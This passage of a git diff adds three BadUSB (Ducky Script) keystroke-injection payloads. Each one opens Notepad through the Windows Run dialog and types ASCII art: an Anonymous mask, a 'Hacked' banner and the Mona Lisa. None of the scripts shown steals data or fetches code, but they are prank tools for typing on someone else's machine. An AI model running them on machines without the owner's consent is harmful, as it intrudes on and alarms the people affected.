-WindowStyle maximized +ENTER diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/Selfwriting/AnonymousASCII.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/Selfwriting/AnonymousASCII.txt new file mode 100644 index 000000000..42c247299 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/Selfwriting/AnonymousASCII.txt @@ -0,0 +1,130 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: Opens Notepad and types out the ASCII art +REM Version: 1.0 +REM Category: ASCII +DELAY 1000 +GUI r +DELAY 500 +STRING notepad +ENTER +DELAY 1000 +GUI UPARROW +DELAY 500 +STRING :-=+**#%%@@@@@@@@@@%%#**+=-: +ENTER +STRING .-+*%@@@#*++=--::........::--=++*#@@@%*+-. +ENTER +STRING .-*#@@#*=-. .:=*#@@%+-. +ENTER +STRING -*@@%*-. .-*%@@*- +ENTER +STRING :=#@%+- -*%@#+. +ENTER +STRING .+%@#=. .=#@%+. +ENTER +STRING -#@%= .=%@#- +ENTER +STRING .+@@*: :*@@+. +ENTER +STRING .*@%= =%@*. +ENTER +STRING .*@%= -%@*. +ENTER +STRING +@@= .. =@@= +ENTER +STRING -%@+ .-=: ..::::::::.::.::::::::.. -+-. +@%- +ENTER +STRING *@%: -*@@*. .::....:.. .: :: :: ..:....::. .*@%*- :%@* +ENTER +STRING :%@+ . +@@@%: ..:. .:. :: :: :: .:. .:.. -@@@@+ . +@%. +ENTER +STRING -@@: .+#-:@@@@# .::. .:. .: :: :. .:. .::. *@@@%:-#+. -@@- +ENTER +STRING =@%. +@% :@@@@-.. .:..::.. .:. : :: .: .:. ..::..:. .:=@@@@:.%@+ .%@= +ENTER +STRING +@% #@@: @@%=.+# .:. .:::.. :. :: :: ..:::. .:. #+.=%@@ :@@# .%@+ +ENTER +STRING +@% : *@@@ **::+@%. .:. .: ....:::..-*++*%%*=.:::.... :. .:. %@*::*+ %@@* : %@= +ENTER +STRING -@%. ++.@@@= .=%@@# :. .: :: :@@+::-@@@+ :: :. .: .#@@%=. =@@@.++ %@- +ENTER +STRING :@@. #@:.@@%.*@@@#- .:. .: :. *#=:::@@@= .: :. .:. -#@@@*.%@@.:@* :@@: +ENTER +STRING %@= +@@:.@@+@@%=: .: .: .: :-%@#- :. :. :. .:=%@@*@@.:@@+ =@% +ENTER +STRING +@# @@@= @@@#- =# ::. :. :: :%=. :: .: .:: %= -#@@@ =@@@ #@= +ENTER +STRING @@: :@@@+ @%:.+@@: .: ...::... .: :. -= .: :. ...::... :. :@@+.:%@ *@@@: .@@ +ENTER +STRING +@* :@@@# =:#@@@- .: ...:::.... : == .: ....:::... :. -@@@*.= #@@@: *@+ +ENTER +STRING @@: : @@@# =@@@@: :. .: ......:::::::..%@@@..:::::::...... :. .: -@@@@= #@@@ . -@@ +ENTER +STRING :@% :+ *@@*+@@@#: .: :: .: -##- :. :: :. :*@@@+*@@+ +. @@: +ENTER +STRING +@* *# .@@*@@%- * :. :. .: :: :. .: .: * -@@@*@@ #* *@+ +ENTER +STRING #@= %@: -@%@# *% .: : :: :----: :: : :. @* *@%@- :@% =@# +ENTER +STRING @@- %@% *@* .%@+ .: .: :. -:-+@@@@@@+-:- :: :. :. *@#. *@# %@% -@% +ENTER +STRING @@: *@@# .# :@@@: ::.............:............:-*@@ -@@= @@*-:............:.............:. :@@@: %. #@@* :@% +ENTER +STRING @@: -@@@# .:@@@# ::.............:........:-=*%@@@# .%@@%. %@@@%*=-:........:.............:. #@@@:. #@@@- :@% +ENTER +STRING @@- %@@@+ %@@@. .: .: -*##%@@@@@@@@@@: - #* - :@@@@@@@@@@%##*: :. :. .@@@# +@@@% -@% +ENTER +STRING #@= .:@@@@.@@@= + .: ::@@@@@@@@@@@@@@@ .@@. @@@@@@@@@@@@@@@:: :. + =@@@.@@@@.: =@# +ENTER +STRING +@* # .%@@+@@% @- :. :+@@@@@@@@@@@@@@@ *@@# @@@@@@@@@@@@@@@+: .: =@ %@@+@@#. # *@+ +ENTER +STRING :@% %#. +@%%@= -@% .: :#@@@@@@@@@@@@@@@= @@@@ =@@@@@@@@@@@@@@@#: :. %@= =@%@@+ #% @@: +ENTER +STRING @@: +@@- .#@@. #@@: :. .@@@@@@@@@@@@@@@@@. @@@@ .@@@@@@@@@@@@@@@@@. .: .@@% .@@#. =@@= -@@ +ENTER +STRING +@* %@@#: =@..@@@= .: ..*@@@@@@@@@@@@@@@@@% @@@@ %@@@@@@@@@@@@@@@@@+.. :. =@@@..@= :%@@% #@+ +ENTER +STRING @@: .#@@@#:..-@@@+ : :: ..::... +@@@@@@@@@@@@@@@@@@%. @@@@..%@@@@@@@@@@@@@@@@@@+ ...::.. :. : +@@@-..:#@@@%. .@@ +ENTER +STRING +@# +@@@@#.:@@@* +* ::. %@@@@@@@@@@@@@@@@@@@@=@@@@+@@@@@@@@@@@@@@@@@@@@# .:: *+ *@@@:.#@@@@= #@= +ENTER +STRING %@= :%@@@@:*@@% .@%. .: :@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@. :. .%@. #@@#-@@@@%. =@% +ENTER +STRING :@@. = -#@@@*%@@. %@%. .:. -@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@- .:. .%@% .@@%+@@@#- = :@@: +ENTER +STRING -@%. -%- =#@%@@+ +@@@. :. +@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@+ .: .@@@+ +@@%@#- -%- .%@- +ENTER +STRING +@% =@%+. -#@@ .@@@% .:. %@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@% .:. %@@@..@@*- .=%@= %@= +ENTER +STRING +@% :%@@%+- -= *@@@+.=. .:.@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@.:. .=.+@@@* =- -+%@@%: .%@+ +ENTER +STRING =@%. -%@@@@%*=. #@@@:.@#- :@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@: -#%.:@@@* .=*%@@@@%- .%@= +ENTER +STRING -@@- :*@@@@@@%=+@@@.:@@%=@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@=%@@..@@@+=%@@@@@@*: -@@- +ENTER +STRING :%@+ .-*%@@@@@#%@%..@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@:.%@%#@@@@@%*-. +@%: +ENTER +STRING *@%: .+- :-=+*#%@@=.#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#.=@@%#*+=-: -+. :%@+ +ENTER +STRING :%@+ =%%*=-::...::: .+%@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%+. :::...::-=*%%= +@%: +ENTER +STRING +@@= -*@@@@@@@@@@@@%##%@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%##%@@@@@@@@@@@@*- =@@+ +ENTER +STRING .*@%= .-+#%@@@@@@@@%*+=:..%@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%..:=+*%@@@@@@@@%#+-. =%@*. +ENTER +STRING .*@@= .-. .. .-+%@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%+-. .. .-. =@@*. +ENTER +STRING .+@@*: .+%##****#%@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%#****#%%+. :*@@+. +ENTER +STRING -#@%=. .=*#%@@@@@@%##@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@##%@@@@@@@#*=. .=%@#- +ENTER +STRING .+%@%=. -@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@= .=#@%+. +ENTER +STRING :+%@%+- +@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@+ -+%@%+: +ENTER +STRING .-*%@%*=: *@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@# :=*%@%*- +ENTER +STRING .-+#@@%*=%@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@=*%@@%+-. +ENTER +STRING .-+*%@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%*+-. +ENTER \ No newline at end of file diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/Selfwriting/Hacked.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/Selfwriting/Hacked.txt new file mode 100644 index 000000000..1f13c0720 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/Selfwriting/Hacked.txt @@ -0,0 +1,116 @@ +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) +REM Description: Opens Notepad and types out the ASCII art +REM Version: 1.0 +REM Category: ASCII +DELAY 1000 +GUI r +DELAY 500 +STRING notepad +ENTER +DELAY 1000 +GUI UPARROW +DELAY 500 +STRING #@@@@@@@/ +ENTER +STRING @@@@@@@@@@@@@@@@@@@ +ENTER +STRING @@@@@@@@@@@@@@@@@@@@@@@@@ +ENTER +STRING .@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ +ENTER +STRING &@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@% +ENTER +STRING &@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@# +ENTER +STRING @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ +ENTER +STRING (@@@@@@@@@@@@@@@@@@@@@@@@@. (@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@* .@@@@@@@@@@@@@@@@@@@@@@@@@& +ENTER +STRING (@@@@@@@@@@@@@@@@@@@@@@@@@, (@@@@@ #@@@, .@@@@@, ,@@@@@@@@@@@@@@@@@@@@@@@@@& +ENTER +STRING (@@@@@@ @@@@# @@@ &@@@@ %@@@@@& +ENTER +STRING (@@@@@@ @@@@. &@@@# *@@@@ %@@@@@& +ENTER +STRING (@@@@@@ (@@@@@* %@@@@@@@@@( /@@@@@, %@@@@@& +ENTER +STRING (@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@ %@@@@@& +ENTER +STRING (@@@@@@ #@@@@ (@@@@@@ @@& ,@@@@@@* .@@@@/ %@@@@@& +ENTER +STRING (@@@@@@ @@@@@@/ (@@@@@@@@@@@@@@@@@@@* %@@@@@@ %@@@@@& +ENTER +STRING (@@@@@@ (@@@@@@@@@@% ,@@ @@@@@@.@@@@@,(@@ &@@@@@@@@@@, %@@@@@& +ENTER +STRING (@@@@@@ .@@@@@@@@@@@@@@& #@@@@@ @@@@@ .@@@@@@@@@@@@@@@ %@@@@@& +ENTER +STRING (@@@@@@ *@@@@@@@@@@, *@@@@@@@@@@* %@@@@@& +ENTER +STRING (@@@@@@ .&@@@@@@@@@( #@@@@@@@@@% %@@@@@& +ENTER +STRING (@@@@@@ %@@@@@@@@@@@@@@@@@( %@@@@@& +ENTER +STRING (@@@@@@ .@@@@@@@@@@@ %@@@@@& +ENTER +STRING (@@@@@@ /@@@@@@@@@@@@@@@@@@@@@@@@@@@@@. %@@@@@& +ENTER +STRING (@@@@@@ @@@@@@@@@@@@ &@@@@@@@@@@@ %@@@@@& +ENTER +STRING (@@@@@@ &@@@@@@ . .@@@@@@% %@@@@@& +ENTER +STRING (@@@@@@ *@@@@& @@@@@. %@@@@@& +ENTER +STRING (@@@@@@ %@@@@@& +ENTER +STRING (@@@@@@ %@@@@@& +ENTER +STRING (@@@@@@ %@@@@@& +ENTER +STRING (@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@& +ENTER +STRING (@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@& +ENTER +ENTER +STRING @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@# +ENTER +STRING /@@@@@, *@@@@ .@@@@. @@@@ ,@@@@ .@@@@ ,@@@@ *@@@@ ,@@@@. /@@@@& +ENTER +STRING @@@@@@ .,@@@@, .@@@@@ ,@@@@* @@@@@ .@@@@& %@@@@ @@@@@.. @@@@@@ +ENTER +STRING &@@@@@% .@@@@% .@@@@% @@@@@ @@@@@ @@@@@ @@@@@* @@@@@ &@@@@@( +ENTER +STRING *@@@@@@. ,@@@@@ %@@@@( @@@@@ (@@@@@ @@@@@, ,@@@@@ &@@@@% .@@@@@ *@@@@@@ +ENTER +STRING @@@@@@@ @@@@@ @@@@@ @@@@@ @@@@@# @@@@@% #@@@@@ *@@@@@ .@@@@@ .@@@@@@& +ENTER +STRING (@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@* +ENTER +STRING @@@@@@@, .@@@@@, @@@@@# @@@@@@ %@@@@@ /@@@@@@@ +ENTER +STRING %@@@@@@@ .@@@@@% .@@@@@( &@@@@@. @@@@@@ @@@@@@@/ +ENTER +STRING @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ +ENTER +STRING @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ +ENTER +STRING @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ +ENTER +ENTER +STRING ##### # # # ##### # # ####### ###### +ENTER +STRING # # #### ##### ##### # # ##### # # ##### # # #### # # # # ## # # ###### ##### ###### ###### # # # # # # # # # # # # # +ENTER +STRING # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # ## # # # # # # # # # # # +ENTER +STRING ##### # # # # # # # ##### # # # # # # # # ###### # # # # ##### ##### ##### ##### # # # ####### # # # ### ##### # # +ENTER +STRING # # # ##### ##### # ### # # # # # # # # # # # # ###### # # # # # # # # # # # # ####### # # # # # # +ENTER +STRING # # # # # # # # # ### # # # # # # # # # # # # # # # # # # # # # # ## # # # # # # # # # # # +ENTER +STRING ##### #### # # # # # # ##### #### # # #### #### # # # # ## ###### ##### ###### ###### # # # # # # ##### # # ####### ###### +ENTER +DELAY 2000 +CTRL HOME +DELAY 2000 +CTRL END \ No newline at end of file diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/Selfwriting/MonaLisa.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/Selfwriting/MonaLisa.txt new file mode 100644 index 000000000..8421a8f43 --- /dev/null +++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/ASCII/Selfwriting/MonaLisa.txt @@ -0,0 +1,177 @@ +REM Author: cribb-it +REM Description: Opens Notepad and types out the ASCII art +REM Version: 1.0 +REM Category: ASCII +DELAY 2500 +GUI R +DELAY 200 +STRING notepad +ENTER +DELAY 300 +ALT SPACE +DELAY 20 +STRING x +ENTER +ENTER +ENTER +STRING XiiisiisrrsssiisssssiiiiiSiiiiiiiiiiiiSSSiiiiiiiissiiiiiiS55SSSSSSS5SSSiiiiisiiiiiiSSS +ENTER +STRING 2rrr;rrr;;rsrr;;;;;rrrrsrsrrrrrr;rrrrrrrrrr;;;;rrrrrrrrrrrrrrssrrr;rrrrrsrrrr;rrr;r;;r +ENTER +STRING 2sssrsisssssssrrriiiisi5iiSSSissssssiSiiiiisiiissssssrrsrrsiiiisssrsissiiisrsssssssiii +ENTER +STRING 5rrrrrrrrrrsrrssssrrsiiiiisisssssrrssssrsisrsssssssrrrrrr;rrrrrrsrrrrsrsrr;;rrrrrrrsii +ENTER +STRING 2;;rr;;;r;;;;;;;;rrrrrrssrrsrrsr;rrsrrr;;;;;;;rsrrssrrrr;;;;rrrrr;r;rrrr;;;;;rrrrrrsrs +ENTER +STRING 5rrrrrrrrr;;:;;;;;;;r;;rrrrrrrr;rrrrr;;;;;;::,::;;rrrrr;:;;;rrrr;;rrr;rrr;rrrrrrrrrrss +ENTER +STRING i;rr;rr;;;;;;;;;;;;:;;;;;;rr;;;rr;;;;;::,:;:::,,,:;;;;;;;;;;rrrrrrrrr;;rr;;rr;;rrrrrrr +ENTER +STRING s;r;::::;;:;;r;;;;;;;;;:;r;rrrr;;::,,;SGH#@@##HG2i;::;;;;;;;rrrrr;rrrr;rr;;r;:;;rrrrrr +ENTER +STRING i;;;;::;r;;;:;;;;;;;:::;;;;;;r;;:,;5#@@#@@@@@@@@@@@Mi:,;:;;rrr;rr;;;;;;r;;;;;:;;;rrrrr +ENTER +STRING i;;r;r;;;;:::;;:;::::;;;;;::;;:::s@@@@Ah@@@@@@@@@@@@@@r.:::;;;r;;;:;:::;;;;;;;;;;;;rrr +ENTER +STRING S;;::::::,:::::::::::::;;::::::.2@@#h2rih&H@@@@@@@@@@@@3..,::;;;;;;:;:;:::;::;;;r;;rr; +ENTER +STRING Sr;:.,,:,,:::;::::,,::;;;:::,,.i@Hr. .,;2HB#@@@@@@@@A.,:,:::;;::::::,:;:;;;;;;rrr; +ENTER +STRING i;;;:::,:,,,,:::::,:::::::,,,,S@&. :sXA##@@@@@@@A .,,::,,::::::::::::;;;;;rr; +ENTER +STRING r,:,,;:,,....,,,,,,,,:.,::,..r@@; ,r2GH#@#@@@@@@s ,:::,,:,,,:::,,,,::::;;;;; +ENTER +STRING r,:..,:;.... . .,,::,,:;:..rh@#;, ..,....,;;ri2hA##@#@@@@@:r;;:r;;:;:::::::,,:,:;;;:: +ENTER +STRING 2rr;;;S5:,...,:. ..,:,,:,,.;A@@X:,....... .,::::;iA###@@@@@92Si52r:r;;;::,,:::::::;r;: +ENTER +STRING 9iXAGs5X2r;;rsis:,. .... .S#@@S..,, . ,;;:,,::r2B@@@@@@@@AXH332iiir5s,,,,:::,,;;iSsr +ENTER +STRING BAABA2S2552925hXh95s.... .;&A#@Hi2GAi,,s@@Bh&HM#BAM@@@@@#@@MABhXS5X5s9is::,::. ,;;ss5S +ENTER +STRING #MG3hS22S2h&XhAAA2iH; .:.:rBBH@#@A@@@;,@@9;#@@@#SS&###@@@@@@hAHBGX92A#35;.,,:,:;;rriSr +ENTER +STRING #GX5iiXSi3X2i&Hhh5X&;:2M&;;H##@;,,rXr..AX,.;sr, .rG@@#@@@#@@GHHA&3A&AAG9;.,,::;rrrsX5r +ENTER +STRING Mh332X252999GAG9HHA##A#G@HXh#@@: . .sr ,r2M@@@@@@@@@HA&A9X&&HBBB3;:;:;r;:;riii +ENTER +STRING AA#AGHAGhHG2GAh&B#M###MA@#HABM@3 ., .is,. .:S3A@@@@@#@@@@A25SsiSiS55XX5rrrrrrrissi5 +ENTER +STRING BM@#&ABM&Ah25X3GAHAAHMB#@@@#HM@#:..;r :29;.,:rShAM@@##@@@@@@#MMHGXX222SiisiiSXGh#MX2A& +ENTER +STRING #M##B9&H&GAAAGX2&9&GAHAM#@@###@@3r;.:X@@@;.;s29&AM##@@@@@@@@@@@@@@######MHB#B#HA#@@@@M +ENTER +STRING #####hG&&AH&HBhhAAAA&HHB#B#@@M@@AsSs,rHBhhG5siX3GB#@@@@@@#@@#MMMBBBB#####@@#H&GAA####B +ENTER +STRING #B#MA9hAAH&hhAABHHHBBHMMBHB#MA@@@r;;;;s9BAS;rs2hA##@@##@@@@@#BHAAHHHBMMBHH&X2XhAB####M +ENTER +STRING #M#BGHAHAAAHHBMBHBHHAAA&GGHHM#@@@@3: .;riiisS3AAHM#@##@@@@@@#AGHBHHHAHBHHHAHM##HH&&B#M +ENTER +STRING ##M###BH&&H#MBHHHAG&hGhGG9&A##M#@@@@; :s2hH#MBM#@###@@@@@@#BhAH&939AHHAAAHHH&hAAAM@M +ENTER +STRING ##MMMM@#&&AHHM#MMMAMHA&9X2A#BB#M#@@@@AS3AB@@###@@#@@#####@@@##HAAHGAABA&A&&&HBAABAAM#M +ENTER +STRING ###HB#M#B&&A&HHA&AXGX22isi9###@#@@@@@@@@@@@@@@@#MMMM####@@@@@@#B##BHHBMMMMM####MHAAAAM +ENTER +STRING ####@@H#@A&Ahh3222S5issi552H@@####@@@@@iS&M@#MA&hX3A#@#@@@#M@@HHHHA&GAHMMBM@#MMMBM@@BB +ENTER +STRING #M##B@##AAHX225522i5X5S2559h##M##@#@@@@i.;s2XXX2isS3B##@@@##@@MA&3iSX25XS2322iss2&BBAB +ENTER +STRING #BA&93X52X559GHAM#H3h9&3&&BM@#@#@#@@@@@h;::;rsrrr;riG#M##@BB@@@@@@###G2XGhi;;iiXh2A#@# +ENTER +STRING #H9X9X9223XS9ABMGG@@@#@@@@@@@@@@@@@@H2;;;::;;;::;;:;5B#BABBH@@@@@@@@@@@@@@G;r2hhXS&@@# +ENTER +STRING ##BG3H#AA9X&M#&GA&@@@@@@M@@@@###@#X;:. ..,,,...,:,:sGMMhGHM@@@@@#BAh5issisriAH&AhM@@# +ENTER +STRING #BB#M@@AhhAA&h52X#@@G@@#B@@@##@##; ... .,,:;2#HA2&H@@##@@@MAAX:.,;52h92GA&AGB# +ENTER +STRING #MABAHMX2&3GX2SGHM#MhB@BAM@####A5. .... .,,;;i&3BGA#@@#@##@@@@#XiSsiisi525rSGH# +ENTER +STRING #M&HX2BHrrrSSS3hHAAA3&AAB@@@#&33; .... ..,,:rXB&BGH@@@#&3AH#@@#MHhXissGiriS2XXM +ENTER +STRING #MB#AH@@G3r:;risXAA92&#@@@@@&rrs, .... .,:::r93GHAM#HGXS5XhA#@@@@MAGXsrrr;:,,;G +ENTER +STRING #AAA&BMHB@@#3ssiiXG9H@@@##@#s,,. ... .. ...,,:r39HHG2s;::;;s2XH@@@@@@@@@##@HH9G&9 +ENTER +STRING #A&925GAAB##@A3A3r;&@@@##@@Hr .... .:;sS5X5r;;;i3AB##@@@@@@@@@@@@@@@B2s;5 +ENTER +STRING #AAHHHH&32&&33X5Sr2@@@@##@#HHr .,. .:ri25i2A#@@@@@@@@@@@@@@@@@#@@@@@@AS9 +ENTER +STRING #H&AG22iri2SrrsiG@@@@@#B@MBAAMAAS;;;. :iX9AM#@@@@@@@@@@@@@@@@@@@@@@AHB#@@@@# +ENTER +STRING @M&h52r2GHXX&HB#@@@#@#M@MGh9HM@@#@@#AXirr;:,,,rXH@MH@@@@@@@@####@@@@@@@@@@@@@#G&9H@#B# +ENTER +STRING @#AXX92S2X5iSS2@@###@@##AhGAH@#B@#HM#@@@@@@@####@@M#@@@@@#A9&#B#@@@@@@@@@@@@@@#@M#@@AM +ENTER +STRING @@@BHAGX25222i2@@@##@@@@AA#&#@B@#GG&BBHB##@@#MH#@@@@@@@#MMh9@B#@######@@@@@@@@@M#@@@## +ENTER +STRING @@@@#MMBHHMMBAM@@@@@@#@#A###@H#@M&&hGAHM###BM#@@@@@@###BB#B@MHA25hHAHB#@@@@@@@@AXGG#@@ +ENTER +STRING @#@#GAA&HBBAB##@@@@@@@@#M@#@#H#@MH#HBBM@#HH##@@@@@@@#@##@@@MBH2XG&H&BM#@@@@@@@@@BBA@@@ +ENTER +STRING ##@2iisii5is5A#@@@@@@@@@#@@@##@@#@@@@@@#H#BM@@@@@@@@@@#@@@#AB&XG9hHM@@@@@@##@@@@@@#@@@ +ENTER +STRING @#XsrsrrrrrrS#@#@@@#@@@@@@@@M#@@@@#@@@#HHM#@@@@@@@@@@@@@@#AHBh9AA#@@@@@@@@@#M@@@#hAh#@ +ENTER +STRING #GSX222Xis5S#@@@@@@@@@@@#@@@##@@@@@@@@MMM@@@#@@@@@@@@@@@#BAH#AA#@@@@@@@@@@@###@@@AGG3M +ENTER +STRING #@@@#MMMMB#@@@@@#MM#@@@@@@@@##@@@@@@####@@###@@@@@@@@@@@#MB@@@@@@@#@@@@@@@@@#@@@@@@@@# +ENTER +STRING ####MHAB#@@@@@@#MMBB##@@@@@@@#@@@@@##@#####@@@@@@@@@@@@@##@@@@@@@##@@@@@@@@@@@@@@@@@@@ +ENTER +STRING #MHHH&H@@@@##@@MBHHHB##@#@@@@#@#@@@#@####@@@##@@@@@@@@@@##@@@@@@##@@@@@@@@@@@@@@#####@ +ENTER +STRING ###BB@@@@@###MMBH&&AM####@@@####@@@@#B#@@@@@@@#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@###M#@ +ENTER +STRING #M#M@@@@###BAM#@###M##M##@@@#@@@@@@MB#@@@@@@@@@@@@@@@@@@@@@@@@####@#@@@@@@@@@@@####M#@ +ENTER +STRING ###@@##M@@@@@@@@@@@@@@##@@@@@@@@@###@@@@@@@@@@@@@@@@@@@@@@@@@@@@###B##@@@@@@@@###@@#B@ +ENTER +STRING @@@@@##@@#@H&&ABAHHB@@@#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#@@###@@@@@@@@###@@@@#@ +ENTER +STRING @@@@#@#@MH&Ai&#G&A3&@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@##@@@@@@@@@@@@@@@@@@@@@@ +ENTER +STRING @#@@##@@BHHGGXrXA23GXS#@Mh529H@@@@@@@@@@@@@@@@@@@@@@@@@@@#@@@@@@@##@@@@@@@@@@@@@@@@@@@ +ENTER +STRING @@@@##@@B#Xi2SH&SA3Xihi. ,;SA@@@@@@@@@@@@@@@@@@@@@@@@@@@@@####@@@@@@@@@@@@@#@@@@@ +ENTER +STRING @@@@##@@##X5M#32#BAH@5: ..,;3@@@@@@@@@@@@@@@@@@@@@@@@@@@#@@@@@@@@@@@@@@@@@@@@ +ENTER +STRING @#@@@@@@@#H#@SH@#MA#B3r,:,::,...... ;XA@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ +ENTER +STRING @####@#@@@@@#A@MMHA#A@hiS5Sir::,,,,,.. .rA@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ +ENTER +STRING @#######@@##@@@@@@#@#@@MM#H95sr;;:;;,.:: .2H###&9AH##ASs2GG&&H@@@@@@@@@@@@@@@@@@@@@@ +ENTER +STRING @#@@@@###@@@@@@@@#@@@@@@@@#hSSisrrsir:rH@X. .riiir:;SSSh92i2A&AAA#@@@@@@@@@@@@@@@@@@@@ +ENTER +STRING @@@@@@@@@@@@@@@@@@@@@MXir,;G&X2555ii32;,2@@#Sr5X29AA9AG9BMA22B#MBM#@@@@@@@@@@@@@@@@@@@ +ENTER +STRING @@@@@@@@@@@@@@@#@@@A;:ri:.:rG#HhXXi;rA#i.,X@@#&22h&##hHG3B@@#HM#BBB@@@@@@@@@@@@@@@@@@@ +ENTER +STRING @@@@@@@@@@@@#@@##@@iiA2;rr,:r3##GhAh;.r#@i;rG@@@H#MM#M@#GX#@###@@###@@@@@@@@@@@@@@@@@@ +ENTER +STRING @@@@@###@########@#iGSr3&r;:rsX##&X#@3:,A@#irSB@@##@#M@@@##@@##@@@@@@@@@@@@@@@@@@@@@@@ +ENTER +STRING @@@##@@#@@#######@#X9SAB5i;rXh&B@@@H#@#&hA@@MirA@#@@#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ +ENTER +STRING @@@@@@@@@@@@@@@##@@#BAA2srX#@@@@@@@@@@@@@#M#@@#H@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ +ENTER +STRING @@@@##@@@@@@@##@@@@@@#HSiA@@@@#M##B##@#M#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ +ENTER +STRING @#@@@#####@@####@@@@@@@9H@@@###@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ +ENTER +STRING @#@#@##@@@@@@####@@@@@@MH@@@##@@@#####@@@@@@#@#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ +ENTER +STRING @@@@#@@@###@@##@#@@@#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#@@@@@@@@@@@@@@@@@@@@@@@@@@ +ENTER +STRING @@@@@@@@##@@##@@#####@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@##@@@ +ENTER +STRING @@@@@@@###@@@@@@@@#@@@@@@@@@@@###@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ +ENTER +STRING @@@@@@@@@@@@@@###@@@@@@@@@@@@@@###@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ +ENTER +STRING 